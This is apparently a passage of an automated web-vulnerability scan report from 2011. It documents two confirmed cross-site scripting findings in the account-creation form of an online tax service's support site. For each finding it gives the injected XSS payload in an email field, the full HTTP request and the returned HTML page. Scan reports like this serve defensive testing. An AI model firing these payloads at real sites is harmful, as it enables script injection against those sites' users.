href="myovr.php?OLTSite=&p_sid=iqiL5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br />'Email Address' does not seem to be a valid email address.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br />&l..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST '"--></style></script><script>alert(0x001116)</script>
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST Smith
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 425
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001116)%3C%2Fscript%3E&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=Smith&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:07:41 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:27:41 GMT
RNT-Time: D=111943 t=1304118461663543
RNT-Machine: 05
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=iYkM5Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=iYkM5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=iYkM5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=iYkM5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=iYkM5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" border=&qu..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST '"--></style></script><script>alert(0x00114A)</script>
p_first_name POST Smith
p_last_name POST Smith
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 425
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00114A)%3C%2Fscript%3E&p_first_name=Smith&p_last_name=Smith&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:07:45 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:27:45 GMT
RNT-Time: D=117361 t=1304118465526414
RNT-Machine: 09
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=ewmN5Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=ewmN5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=ewmN5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=ewmN5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=ewmN5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area 